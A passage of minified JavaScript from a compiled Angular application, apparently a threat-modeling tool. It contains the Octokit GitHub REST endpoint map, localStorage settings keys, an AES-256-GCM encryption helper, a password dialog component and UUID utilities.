/repos/{owner}/{repo}/keys"],createDeployment:["POST /repos/{owner}/{repo}/deployments"],createDeploymentBranchPolicy:["POST /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies"],createDeploymentStatus:["POST /repos/{owner}/{repo}/deployments/{deployment_id}/statuses"],createDispatchEvent:["POST /repos/{owner}/{repo}/dispatches"],createForAuthenticatedUser:["POST /user/repos"],createFork:["POST /repos/{owner}/{repo}/forks"],createInOrg:["POST /orgs/{org}/repos"],createOrUpdateEnvironment:["PUT /repos/{owner}/{repo}/environments/{environment_name}"],createOrUpdateFileContents:["PUT /repos/{owner}/{repo}/contents/{path}"],createPagesDeployment:["POST /repos/{owner}/{repo}/pages/deployment"],createPagesSite:["POST /repos/{owner}/{repo}/pages"],createRelease:["POST /repos/{owner}/{repo}/releases"],createTagProtection:["POST /repos/{owner}/{repo}/tags/protection"],createUsingTemplate:["POST /repos/{template_owner}/{template_repo}/generate"],createWebhook:["POST /repos/{owner}/{repo}/hooks"],declineInvitation:["DELETE /user/repository_invitations/{invitation_id}",{},{renamed:["repos","declineInvitationForAuthenticatedUser"]}],declineInvitationForAuthenticatedUser:["DELETE /user/repository_invitations/{invitation_id}"],delete:["DELETE /repos/{owner}/{repo}"],deleteAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions"],deleteAdminBranchProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/enforce_admins"],deleteAnEnvironment:["DELETE /repos/{owner}/{repo}/environments/{environment_name}"],deleteAutolink:["DELETE /repos/{owner}/{repo}/autolinks/{autolink_id}"],deleteBranchProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection"],deleteCommitComment:["DELETE /repos/{owner}/{repo}/comments/{comment_id}"],deleteCommitSignatureProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_signatures"],deleteDeployKey:["DELETE /repos/{owner}/{repo}/keys/{key_id}"],deleteDeployment:["DELETE /repos/{owner}/{repo}/deployments/{deployment_id}"],deleteDeploymentBranchPolicy:["DELETE /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies/{branch_policy_id}"],deleteFile:["DELETE /repos/{owner}/{repo}/contents/{path}"],deleteInvitation:["DELETE /repos/{owner}/{repo}/invitations/{invitation_id}"],deletePagesSite:["DELETE /repos/{owner}/{repo}/pages"],deletePullRequestReviewProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_pull_request_reviews"],deleteRelease:["DELETE /repos/{owner}/{repo}/releases/{release_id}"],deleteReleaseAsset:["DELETE /repos/{owner}/{repo}/releases/assets/{asset_id}"],deleteTagProtection:["DELETE /repos/{owner}/{repo}/tags/protection/{tag_protection_id}"],deleteWebhook:["DELETE /repos/{owner}/{repo}/hooks/{hook_id}"],disableAutomatedSecurityFixes:["DELETE /repos/{owner}/{repo}/automated-security-fixes"],disableLfsForRepo:["DELETE /repos/{owner}/{repo}/lfs"],disableVulnerabilityAlerts:["DELETE /repos/{owner}/{repo}/vulnerability-alerts"],downloadArchive:["GET /repos/{owner}/{repo}/zipball/{ref}",{},{renamed:["repos","downloadZipballArchive"]}],downloadTarballArchive:["GET /repos/{owner}/{repo}/tarball/{ref}"],downloadZipballArchive:["GET /repos/{owner}/{repo}/zipball/{ref}"],enableAutomatedSecurityFixes:["PUT /repos/{owner}/{repo}/automated-security-fixes"],enableLfsForRepo:["PUT /repos/{owner}/{repo}/lfs"],enableVulnerabilityAlerts:["PUT /repos/{owner}/{repo}/vulnerability-alerts"],generateReleaseNotes:["POST /repos/{owner}/{repo}/releases/generate-notes"],get:["GET /repos/{owner}/{repo}"],getAccessRestrictions:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions"],getAdminBranchProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/enforce_admins"],getAllEnvironments:["GET /repos/{owner}/{repo}/environments"],getAllStatusCheckContexts:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts"],getAllTopics:["GET /repos/{owner}/{repo}/topics"],getAppsWithAccessToProtectedBranch:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps"],getAutolink:["GET /repos/{owner}/{repo}/autolinks/{autolink_id}"],getBranch:["GET /repos/{owner}/{repo}/branches/{branch}"],getBranchProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection"],getClones:["GET /repos/{owner}/{repo}/traffic/clones"],getCodeFrequencyStats:["GET /repos/{owner}/{repo}/stats/code_frequency"],getCollaboratorPermissionLevel:["GET /repos/{owner}/{repo}/collaborators/{username}/permission"],getCombinedStatusForRef:["GET /repos/{owner}/{repo}/commits/{ref}/status"],getCommit:["GET /repos/{owner}/{repo}/commits/{ref}"],getCommitActivityStats:["GET /repos/{owner}/{repo}/stats/commit_activity"],getCommitComment:["GET /repos/{owner}/{repo}/comments/{comment_id}"],getCommitSignatureProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_signatures"],getCommunityProfileMetrics:["GET /repos/{owner}/{repo}/community/profile"],getContent:["GET /repos/{owner}/{repo}/contents/{path}"],getContributorsStats:["GET /repos/{owner}/{repo}/stats/contributors"],getDeployKey:["GET /repos/{owner}/{repo}/keys/{key_id}"],getDeployment:["GET /repos/{owner}/{repo}/deployments/{deployment_id}"],getDeploymentBranchPolicy:["GET /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies/{branch_policy_id}"],getDeploymentStatus:["GET /repos/{owner}/{repo}/deployments/{deployment_id}/statuses/{status_id}"],getEnvironment:["GET /repos/{owner}/{repo}/environments/{environment_name}"],getLatestPagesBuild:["GET /repos/{owner}/{repo}/pages/builds/latest"],getLatestRelease:["GET /repos/{owner}/{repo}/releases/latest"],getPages:["GET /repos/{owner}/{repo}/pages"],getPagesBuild:["GET /repos/{owner}/{repo}/pages/builds/{build_id}"],getPagesHealthCheck:["GET /repos/{owner}/{repo}/pages/health"],getParticipationStats:["GET /repos/{owner}/{repo}/stats/participation"],getPullRequestReviewProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_pull_request_reviews"],getPunchCardStats:["GET /repos/{owner}/{repo}/stats/punch_card"],getReadme:["GET /repos/{owner}/{repo}/readme"],getReadmeInDirectory:["GET /repos/{owner}/{repo}/readme/{dir}"],getRelease:["GET /repos/{owner}/{repo}/releases/{release_id}"],getReleaseAsset:["GET /repos/{owner}/{repo}/releases/assets/{asset_id}"],getReleaseByTag:["GET /repos/{owner}/{repo}/releases/tags/{tag}"],getStatusChecksProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks"],getTeamsWithAccessToProtectedBranch:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams"],getTopPaths:["GET /repos/{owner}/{repo}/traffic/popular/paths"],getTopReferrers:["GET /repos/{owner}/{repo}/traffic/popular/referrers"],getUsersWithAccessToProtectedBranch:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users"],getViews:["GET /repos/{owner}/{repo}/traffic/views"],getWebhook:["GET /repos/{owner}/{repo}/hooks/{hook_id}"],getWebhookConfigForRepo:["GET /repos/{owner}/{repo}/hooks/{hook_id}/config"],getWebhookDelivery:["GET /repos/{owner}/{repo}/hooks/{hook_id}/deliveries/{delivery_id}"],listAutolinks:["GET /repos/{owner}/{repo}/autolinks"],listBranches:["GET /repos/{owner}/{repo}/branches"],listBranchesForHeadCommit:["GET /repos/{owner}/{repo}/commits/{commit_sha}/branches-where-head"],listCollaborators:["GET /repos/{owner}/{repo}/collaborators"],listCommentsForCommit:["GET /repos/{owner}/{repo}/commits/{commit_sha}/comments"],listCommitCommentsForRepo:["GET /repos/{owner}/{repo}/comments"],listCommitStatusesForRef:["GET /repos/{owner}/{repo}/commits/{ref}/statuses"],listCommits:["GET /repos/{owner}/{repo}/commits"],listContributors:["GET /repos/{owner}/{repo}/contributors"],listDeployKeys:["GET /repos/{owner}/{repo}/keys"],listDeploymentBranchPolicies:["GET /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies"],listDeploymentStatuses:["GET /repos/{owner}/{repo}/deployments/{deployment_id}/statuses"],listDeployments:["GET /repos/{owner}/{repo}/deployments"],listForAuthenticatedUser:["GET /user/repos"],listForOrg:["GET /orgs/{org}/repos"],listForUser:["GET /users/{username}/repos"],listForks:["GET /repos/{owner}/{repo}/forks"],listInvitations:["GET /repos/{owner}/{repo}/invitations"],listInvitationsForAuthenticatedUser:["GET /user/repository_invitations"],listLanguages:["GET /repos/{owner}/{repo}/languages"],listPagesBuilds:["GET /repos/{owner}/{repo}/pages/builds"],listPublic:["GET /repositories"],listPullRequestsAssociatedWithCommit:["GET /repos/{owner}/{repo}/commits/{commit_sha}/pulls"],listReleaseAssets:["GET /repos/{owner}/{repo}/releases/{release_id}/assets"],listReleases:["GET /repos/{owner}/{repo}/releases"],listTagProtection:["GET /repos/{owner}/{repo}/tags/protection"],listTags:["GET /repos/{owner}/{repo}/tags"],listTeams:["GET /repos/{owner}/{repo}/teams"],listWebhookDeliveries:["GET /repos/{owner}/{repo}/hooks/{hook_id}/deliveries"],listWebhooks:["GET /repos/{owner}/{repo}/hooks"],merge:["POST /repos/{owner}/{repo}/merges"],mergeUpstream:["POST /repos/{owner}/{repo}/merge-upstream"],pingWebhook:["POST /repos/{owner}/{repo}/hooks/{hook_id}/pings"],redeliverWebhookDelivery:["POST /repos/{owner}/{repo}/hooks/{hook_id}/deliveries/{delivery_id}/attempts"],removeAppAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps",{},{mapToData:"apps"}],removeCollaborator:["DELETE /repos/{owner}/{repo}/collaborators/{username}"],removeStatusCheckContexts:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts",{},{mapToData:"contexts"}],removeStatusCheckProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks"],removeTeamAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams",{},{mapToData:"teams"}],removeUserAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users",{},{mapToData:"users"}],renameBranch:["POST /repos/{owner}/{repo}/branches/{branch}/rename"],replaceAllTopics:["PUT /repos/{owner}/{repo}/topics"],requestPagesBuild:["POST /repos/{owner}/{repo}/pages/builds"],setAdminBranchProtection:["POST /repos/{owner}/{repo}/branches/{branch}/protection/enforce_admins"],setAppAccessRestrictions:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps",{},{mapToData:"apps"}],setStatusCheckContexts:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts",{},{mapToData:"contexts"}],setTeamAccessRestrictions:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams",{},{mapToData:"teams"}],setUserAccessRestrictions:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users",{},{mapToData:"users"}],testPushWebhook:["POST /repos/{owner}/{repo}/hooks/{hook_id}/tests"],transfer:["POST /repos/{owner}/{repo}/transfer"],update:["PATCH /repos/{owner}/{repo}"],updateBranchProtection:["PUT /repos/{owner}/{repo}/branches/{branch}/protection"],updateCommitComment:["PATCH /repos/{owner}/{repo}/comments/{comment_id}"],updateDeploymentBranchPolicy:["PUT /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies/{branch_policy_id}"],updateInformationAboutPagesSite:["PUT /repos/{owner}/{repo}/pages"],updateInvitation:["PATCH /repos/{owner}/{repo}/invitations/{invitation_id}"],updatePullRequestReviewProtection:["PATCH /repos/{owner}/{repo}/branches/{branch}/protection/required_pull_request_reviews"],updateRelease:["PATCH /repos/{owner}/{repo}/releases/{release_id}"],updateReleaseAsset:["PATCH /repos/{owner}/{repo}/releases/assets/{asset_id}"],updateStatusCheckPotection:["PATCH /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks",{},{renamed:["repos","updateStatusCheckProtection"]}],updateStatusCheckProtection:["PATCH /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks"],updateWebhook:["PATCH /repos/{owner}/{repo}/hooks/{hook_id}"],updateWebhookConfigForRepo:["PATCH /repos/{owner}/{repo}/hooks/{hook_id}/config"],uploadReleaseAsset:["POST /repos/{owner}/{repo}/releases/{release_id}/assets{?name,label}",{baseUrl:"https://uploads.github.com"}]},search:{code:["GET /search/code"],commits:["GET /search/commits"],issuesAndPullRequests:["GET /search/issues"],labels:["GET /search/labels"],repos:["GET /search/repositories"],topics:["GET /search/topics"],users:["GET /search/users"]},secretScanning:{getAlert:["GET /repos/{owner}/{repo}/secret-scanning/alerts/{alert_number}"],listAlertsForEnterprise:["GET /enterprises/{enterprise}/secret-scanning/alerts"],listAlertsForOrg:["GET /orgs/{org}/secret-scanning/alerts"],listAlertsForRepo:["GET /repos/{owner}/{repo}/secret-scanning/alerts"],listLocationsForAlert:["GET /repos/{owner}/{repo}/secret-scanning/alerts/{alert_number}/locations"],updateAlert:["PATCH /repos/{owner}/{repo}/secret-scanning/alerts/{alert_number}"]},teams:{addOrUpdateMembershipForUserInOrg:["PUT /orgs/{org}/teams/{team_slug}/memberships/{username}"],addOrUpdateProjectPermissionsInOrg:["PUT /orgs/{org}/teams/{team_slug}/projects/{project_id}"],addOrUpdateRepoPermissionsInOrg:["PUT /orgs/{org}/teams/{team_slug}/repos/{owner}/{repo}"],checkPermissionsForProjectInOrg:["GET /orgs/{org}/teams/{team_slug}/projects/{project_id}"],checkPermissionsForRepoInOrg:["GET /orgs/{org}/teams/{team_slug}/repos/{owner}/{repo}"],create:["POST /orgs/{org}/teams"],createDiscussionCommentInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments"],createDiscussionInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions"],deleteDiscussionCommentInOrg:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}"],deleteDiscussionInOrg:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}"],deleteInOrg:["DELETE /orgs/{org}/teams/{team_slug}"],getByName:["GET /orgs/{org}/teams/{team_slug}"],getDiscussionCommentInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}"],getDiscussionInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}"],getMembershipForUserInOrg:["GET /orgs/{org}/teams/{team_slug}/memberships/{username}"],list:["GET /orgs/{org}/teams"],listChildInOrg:["GET /orgs/{org}/teams/{team_slug}/teams"],listDiscussionCommentsInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments"],listDiscussionsInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions"],listForAuthenticatedUser:["GET /user/teams"],listMembersInOrg:["GET /orgs/{org}/teams/{team_slug}/members"],listPendingInvitationsInOrg:["GET /orgs/{org}/teams/{team_slug}/invitations"],listProjectsInOrg:["GET /orgs/{org}/teams/{team_slug}/projects"],listReposInOrg:["GET /orgs/{org}/teams/{team_slug}/repos"],removeMembershipForUserInOrg:["DELETE /orgs/{org}/teams/{team_slug}/memberships/{username}"],removeProjectInOrg:["DELETE /orgs/{org}/teams/{team_slug}/projects/{project_id}"],removeRepoInOrg:["DELETE /orgs/{org}/teams/{team_slug}/repos/{owner}/{repo}"],updateDiscussionCommentInOrg:["PATCH /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}"],updateDiscussionInOrg:["PATCH /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}"],updateInOrg:["PATCH /orgs/{org}/teams/{team_slug}"]},users:{addEmailForAuthenticated:["POST /user/emails",{},{renamed:["users","addEmailForAuthenticatedUser"]}],addEmailForAuthenticatedUser:["POST /user/emails"],block:["PUT /user/blocks/{username}"],checkBlocked:["GET /user/blocks/{username}"],checkFollowingForUser:["GET /users/{username}/following/{target_user}"],checkPersonIsFollowedByAuthenticated:["GET /user/following/{username}"],createGpgKeyForAuthenticated:["POST /user/gpg_keys",{},{renamed:["users","createGpgKeyForAuthenticatedUser"]}],createGpgKeyForAuthenticatedUser:["POST /user/gpg_keys"],createPublicSshKeyForAuthenticated:["POST /user/keys",{},{renamed:["users","createPublicSshKeyForAuthenticatedUser"]}],createPublicSshKeyForAuthenticatedUser:["POST /user/keys"],createSshSigningKeyForAuthenticatedUser:["POST /user/ssh_signing_keys"],deleteEmailForAuthenticated:["DELETE /user/emails",{},{renamed:["users","deleteEmailForAuthenticatedUser"]}],deleteEmailForAuthenticatedUser:["DELETE /user/emails"],deleteGpgKeyForAuthenticated:["DELETE /user/gpg_keys/{gpg_key_id}",{},{renamed:["users","deleteGpgKeyForAuthenticatedUser"]}],deleteGpgKeyForAuthenticatedUser:["DELETE /user/gpg_keys/{gpg_key_id}"],deletePublicSshKeyForAuthenticated:["DELETE /user/keys/{key_id}",{},{renamed:["users","deletePublicSshKeyForAuthenticatedUser"]}],deletePublicSshKeyForAuthenticatedUser:["DELETE /user/keys/{key_id}"],deleteSshSigningKeyForAuthenticatedUser:["DELETE /user/ssh_signing_keys/{ssh_signing_key_id}"],follow:["PUT /user/following/{username}"],getAuthenticated:["GET /user"],getByUsername:["GET /users/{username}"],getContextForUser:["GET /users/{username}/hovercard"],getGpgKeyForAuthenticated:["GET /user/gpg_keys/{gpg_key_id}",{},{renamed:["users","getGpgKeyForAuthenticatedUser"]}],getGpgKeyForAuthenticatedUser:["GET /user/gpg_keys/{gpg_key_id}"],getPublicSshKeyForAuthenticated:["GET /user/keys/{key_id}",{},{renamed:["users","getPublicSshKeyForAuthenticatedUser"]}],getPublicSshKeyForAuthenticatedUser:["GET /user/keys/{key_id}"],getSshSigningKeyForAuthenticatedUser:["GET /user/ssh_signing_keys/{ssh_signing_key_id}"],list:["GET /users"],listBlockedByAuthenticated:["GET /user/blocks",{},{renamed:["users","listBlockedByAuthenticatedUser"]}],listBlockedByAuthenticatedUser:["GET /user/blocks"],listEmailsForAuthenticated:["GET /user/emails",{},{renamed:["users","listEmailsForAuthenticatedUser"]}],listEmailsForAuthenticatedUser:["GET /user/emails"],listFollowedByAuthenticated:["GET /user/following",{},{renamed:["users","listFollowedByAuthenticatedUser"]}],listFollowedByAuthenticatedUser:["GET /user/following"],listFollowersForAuthenticatedUser:["GET /user/followers"],listFollowersForUser:["GET /users/{username}/followers"],listFollowingForUser:["GET /users/{username}/following"],listGpgKeysForAuthenticated:["GET /user/gpg_keys",{},{renamed:["users","listGpgKeysForAuthenticatedUser"]}],listGpgKeysForAuthenticatedUser:["GET /user/gpg_keys"],listGpgKeysForUser:["GET /users/{username}/gpg_keys"],listPublicEmailsForAuthenticated:["GET /user/public_emails",{},{renamed:["users","listPublicEmailsForAuthenticatedUser"]}],listPublicEmailsForAuthenticatedUser:["GET /user/public_emails"],listPublicKeysForUser:["GET /users/{username}/keys"],listPublicSshKeysForAuthenticated:["GET /user/keys",{},{renamed:["users","listPublicSshKeysForAuthenticatedUser"]}],listPublicSshKeysForAuthenticatedUser:["GET /user/keys"],listSshSigningKeysForAuthenticatedUser:["GET /user/ssh_signing_keys"],listSshSigningKeysForUser:["GET /users/{username}/ssh_signing_keys"],setPrimaryEmailVisibilityForAuthenticated:["PATCH /user/email/visibility",{},{renamed:["users","setPrimaryEmailVisibilityForAuthenticatedUser"]}],setPrimaryEmailVisibilityForAuthenticatedUser:["PATCH /user/email/visibility"],unblock:["DELETE /user/blocks/{username}"],unfollow:["DELETE /user/following/{username}"],updateAuthenticated:["PATCH /user"]}};function rwe(t,a,e,i,n){const r=t.request.defaults(i);return Object.assign(function c(...d){let T=r.endpoint.merge(...d);if(n.mapToData)return T=Object.assign({},T,{data:T[n.mapToData],[n.mapToData]:void 0}),r(T);if(n.renamed){const[k,q]=n.renamed;t.log.warn(`octokit.${a}.${e}() has been renamed to octokit.${k}.${q}()`)}if(n.deprecated&&t.log.warn(n.deprecated),n.renamedParameters){const k=r.endpoint.merge(...d);for(const[q,Y]of Object.entries(n.renamedParameters))q in k&&(t.log.warn(`"${q}" parameter is deprecated for "octokit.${a}.${e}()". Use "${Y}" instead`),Y in k||(k[Y]=k[q]),delete k[q]);return r(k)}return r(...d)},r)}function hG(t){const a=function uG(t,a){const e={};for(const[i,n]of Object.entries(a))for(const[r,c]of Object.entries(n)){const[d,T,k]=c,[q,Y]=d.split(/ /),te=Object.assign({method:q,url:Y},T);e[i]||(e[i]={});e[i][r]=k?rwe(t,i,r,te,k):t.request.defaults(te)}return e}(t,dG);return L7(ZT({},a),{rest:a})}hG.VERSION="6.8.1";const Sl=p5.plugin(rG,hG,lG).defaults({userAgent:"octokit-rest.js/19.0.5"});var si=(()=>{return(t=si||(si={})).AUTH_KEEP_SIGNED_IN="keep_signed_in",t.AUTH_ACCESS_TOKEN="auth_access_token",t.AUTH_GUEST="auth_guest",t.AUTH_LAST_CODE="auth_last_code",t.COOKIE_CONSENT="cookie_consent",t.CURRENT_VERSION="current_verison",t.CVE_SEARCH_HISTORY="cve_search_history",t.DARK_MODE="dark_mode",t.DIALOG_WARNING_CONSENT="dialog_warning_consent",t.GH_ACCOUNT_NAME="github_account_name",t.GH_USER_NAME="github_user_name",t.GH_USER_URL="github_user_url",t.GH_USER_EMAIL="github_user_email",t.LANGUAGE="language",t.LAST_FILE="last_project",t.MSG_SHOW_ERROR="msg_show_error",t.MSG_SHOW_WARNING="msg_show_warning",t.MSG_SHOW_SUCCESS="msg_show_success",t.MSG_SHOW_INFO="msg_show_info",t.MSG_SHOW_UNSAVED_CHANGED="msg_show_unsaved_changes",t.PAGE_CONFIG_TAB_INDEX="page_config_tab_index",t.PAGE_CONFIG_SPLIT_SIZE_1="page_config_split_size_1",t.PAGE_CONFIG_CHECKLISTS_TAB_INDEX="page_config_checklists_tab_index",t.PAGE_CONFIG_CHECKLISTS_SPLIT_SIZE_X="page_config_checklists_split_size_",t.PAGE_CONFIG_COMPONENTS_TAB_INDEX="page_config_components_tab_index",t.PAGE_CONFIG_STENCILS_TAB_INDEX="page_config_stencils_tab_index",t.PAGE_DASHBOARD_SPLIT_SIZE_X="page_dashboard_split_size_",t.PAGE_MITIGATION_SPLIT_SIZE_X="page_mitigation_split_size_",t.PAGE_MODELING_SPLIT_SIZE_X="page_modeling_split_size_",t.PAGE_MODELING_ASSETS_SPLIT_SIZE_X="page_modeling_assets_split_size_",t.PAGE_MODELING_ASSETS_TAB_INDEX="page_modeling_assets_tab_index",t.PAGE_MODELING_CONTAINERTREE_KEEP_STRUC="page_modeling_containertree_keep_struc",t.PAGE_MODELING_CONTAINERTREE_SHOW_SCEN="page_modeling_containertree_show_scen",t.PAGE_MODELING_CONTAINERTREE_SHOW_MEAS="page_modeling_containertree_show_meas",t.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT="page_modeling_diagram_anchor_count",t.PAGE_MODELING_DIAGRAM_ARROW_BEND="page_modeling_diagram_arrow_bend",t.PAGE_MODELING_DIAGRAM_ARROW_NAME="page_modeling_diagram_arrow_name",t.PAGE_MODELING_DIAGRAM_ARROW_POS="page_modeling_diagram_arrow_pos",t.PAGE_MODELING_DIAGRAM_SHOW_GRID="page_modeling_diagram_show_grid",t.PAGE_MODELING_DIAGRAM_STICK_GRID="page_modeling_diagram_stick_grid",t.PAGE_MODELING_DIAGRAM_TEXTSIZE_INDEX="page_modeling_diagram_textsize_index",t.PAGE_MODELING_DIAGRAM_ZOOM="page_modeling_diagram_zoom",t.PAGE_MODELING_MODEL_TAB_INDEX="page_modeling_model_tab_index",t.PAGE_MODELING_THREAT_IDENT_TAB_INDEX="page_modeling_threat_ident_tab_index",t.PAGE_REPORTING_DIAGRAM_SHOW_GRID="page_reporting_diagram_show_grid",t.PAGE_REPORTING_SHOW_CHARTS="page_reporting_show_charts",t.PAGE_REPORTING_SHOW_FIRST_STEPS="page_reporting_show_first_steps",t.PAGE_REPORTING_SHOW_TEST_CASES="page_reporting_show_test_cases",t.PAGE_RISK_SPLIT_SIZE_X="page_risk_split_size_",t.FILE_HISTORY="project_history",t.SPELL_CHECK="spell_check",t.WELCOME_TOUR_STARTED="welcome_tour_started",si;var t})();let _r=(()=>{class t{Set(e,i){localStorage.setItem(e,i)}Get(e){return localStorage.getItem(e)}Remove(e){localStorage.removeItem(e)}Clear(){localStorage.clear()}ResetLayout(){this.Remove(si.PAGE_CONFIG_SPLIT_SIZE_1);for(let e=0;e<5;e++)this.Remove(si.PAGE_CONFIG_CHECKLISTS_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_DASHBOARD_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_DASHBOARD_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_MITIGATION_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+e.toString())}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var g2=de(882),g5=de(5449).Buffer;const fG="aes-256-gcm";class y5{constructor(a){this.secret=a}getKey(a){return g2.Sf(this.secret,a,1e5,32,"sha512")}GetRandom(a){return g2.O6(a)}Encrypt(a){const e=g2.O6(16),i=g2.O6(64),n=this.getKey(i),r=g2.CW(fG,n,e),c=g5.concat([r.update(String(a),"utf8"),r.final()]),d=r.getAuthTag();return g5.concat([i,e,d,c]).toString("base64")}Decrypt(a){const e=g5.from(String(a),"base64"),i=e.slice(0,64),n=e.slice(64,80),r=e.slice(80,96),c=e.slice(96),d=this.getKey(i),T=g2.G_(fG,d,n);return T.setAuthTag(r),T.update(c)+T.final("utf8")}}var gG=de(7313);function dwe(t,a){if(1&t&&(m(0,"div",9),s(1),u()),2&t){const e=B();C(1),ct("\n    ",e.data.file,"\n  ")}}let mwe=(()=>{class t{constructor(e,i){this.dialogRef=e,this.data=i,this.show=!1}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(gp))},t.\u0275cmp=Wt({type:t,selectors:[["app-password-dialog"]],decls:32,vars:17,consts:[["mat-dialog-title",""],["mat-dialog-content",""],["style","margin-bottom: 10px;",4,"ngIf"],[2,"width","100%"],["matInput","",3,"type","ngModel","ngModelChange","keydown.enter"],["matSuffix","",3,"click"],["mat-dialog-actions","",2,"float","right"],["mat-button","","mat-dialog-close",""],["mat-button","",3,"mat-dialog-close"],[2,"margin-bottom","10px"]],template:function(e,i){1&e&&(m(0,"h1",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"div",1),s(5,"\n  "),ne(6,dwe,2,1,"div",2),s(7,"\n  "),m(8,"mat-form-field",3),s(9,"\n    "),m(10,"mat-label"),s(11),oe(12,"translate"),u(),s(13,"\n    "),m(14,"input",4),he("ngModelChange",function(r){return i.data.pw=r})("keydown.enter",function(){return i.dialogRef.close(!0)}),u(),s(15,"\n    "),m(16,"mat-icon",5),he("click",function(){return i.show=!i.show}),s(17),u(),s(18,"\n  "),u(),s(19,"\n"),u(),s(20,"\n"),m(21,"div",6),s(22,"\n  "),m(23,"button",7),s(24),oe(25,"translate"),u(),s(26,"\n  "),m(27,"button",8),s(28),oe(29,"translate"),u(),s(30,"\n"),u(),s(31,"\n")),2&e&&(C(1),ke(re(2,9,"dialog.password.title")),C(5),V("ngIf",i.data.file),C(5),ke(re(12,11,"dialog.password.enterpassword")),C(3),V("type",i.show?"text":"password")("ngModel",i.data.pw),C(3),ke(i.show?"visibility_off":"visibility"),C(7),ke(re(25,13,"general.Cancel")),C(3),V("mat-dialog-close",!0),C(1),ke(re(29,15,"general.OK")))},dependencies:[Ri,an,Ta,Ea,oa,da,nn,un,jr,Xa,vm,Am,Tm,Em,Xi]}),t})();class Gi{static FindUniqueName(a,e){const n=e.filter(d=>d.startsWith(a)),c=n.filter(d=>(d=>{if(!d)return!1;for(let T=0;T<(null==d?void 0:d.length);T++)if(!(d[T]>="0"&&d[T]<="9"))return!1;return!0})(d[a.length])).map(d=>d.replace("-Reference","")).map(d=>Number(d.replace(a,"")));return 0==c.length?0==n.length||1==n.length&&n[0]!=a?a:a+"2":a+(Math.max(...c)+1).toString()}static GetNumber(a){let e="";for(let i=a.length-1;i>=0&&a[i]>="0"&&a[i]<="9";i--)e=a[i]+e;return e}static FromCamelCase(a){if(0==a.length)return"";let e=a[0];for(let i=1;i<a.length;i++){let n=a[i],r=a[i-1];n>="A"&&n<="Z"&&(r>="a"&&r<="z"||r>="0"&&r<="9")&&(e+=" "),e+=n}return e}static Format(a,...e){return a.replace(/{(\d+)}/g,(i,n)=>void 0!==e[n]?e[n]:i)}static EmptyIfNull(a){return null==a?"":a}static NullOrEmpty(a){return null==a||""==a}}const CG={randomUUID:"undefined"!=typeof crypto&&crypto.randomUUID&&crypto.randomUUID.bind(crypto)};let hT;const uwe=new Uint8Array(16);function hwe(){if(!hT&&(hT="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto),!hT))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return hT(uwe)}const sc=[];for(let t=0;t<256;++t)sc.push((t+256).toString(16).slice(1));const Fo=function fwe(t,a,e){if(CG.randomUUID&&!a&&!t)return CG.randomUUID();const i=(t=t||{}).random||(t.rng||hwe)();if(i[6]=15&i[6]|64,i[8]=63&i[8]|128,a){e=e||0;for(let n=0;n<16;++n)a[e+n]=i[n];return a}return function 